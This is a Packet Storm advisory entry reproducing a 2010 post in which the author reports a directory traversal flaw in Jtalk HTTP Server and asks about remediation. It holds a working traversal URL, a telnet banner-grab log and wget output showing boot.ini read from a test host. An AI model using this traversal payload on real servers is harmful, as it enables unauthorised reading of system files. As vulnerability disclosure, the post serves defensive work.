Jtalk HTTP Server Directory Traversal

2010-07-02T00:00:00
ID PACKETSTORM:91377
Type packetstorm
Reporter rapper crazy
Modified 2010-07-02T00:00:00

Description

                                        
                                            `Hello All,  
  
Does anyone know of any Directory Traversal issue with Jtalk HTTP server?  
  
I was testing one of my machine and found directory traversal on it.  
http://192.168.10.120/.../.../.../.../.../.../.../.../.../boot.ini  
  
Tried to enumerate the version but failed, attached below are the logs -  
=============Header enumeration=============  
[jt@secBox]$ telnet 192.168.10.120 80  
Trying 192.168.10.120...  
Connected to 192.168.10.120 (192.168.10.120).  
Escape character is '^]'.  
GET / HTTP/1.0  
  
HTTP/1.0 404 Not Found  
Server: JTALKServer  
Allow: GET  
Content-Type: text/html  
Content-Length:87  
  
<HTML>  
<HEAD>  
</HEAD>  
<BODY>  
<H1>HTTP Error 404</H1>  
<H4>Not Found</H4>  
</BODY>  
</HTML>Connection closed by foreign host.  
==============End Header Enumeration===============  
  
  
Attached below are the logs for wget when I downloaded the boot.ini file  
  
=========wget logs==============  
[jt@secBox]$ wget  
http://192.168.10.120/.../.../.../.../.../.../.../.../.../boot.ini  
--2010-06-30 15:58:45--  
http://192.168.10.120/.../.../.../.../.../.../.../.../.../boot.ini  
Connecting to 192.168.10.120:80... connected.  
HTTP request sent, awaiting response... 200 OK  
Length: 208 [application/octet-stream]  
Saving to: `boot.ini'  
  
100%[====================================================================================================================>]  
208 --.-K/s in 0s  
  
2010-06-30 15:58:45 (10.9 MB/s) - `boot.ini' saved [208/208]  
  
[jt@secBox]$ cat boot.ini  
[boot loader]  
timeout=30  
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS  
[operating systems]  
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Standard"  
/noexecute=optout /fastdetect  
[jt@secBox]$  
  
============end of logs=====================  
  
  
So my question is does anyone know of any such issue? What could be the  
remediation apart from disabling the service?  
  
Thanks  
Joshua  
`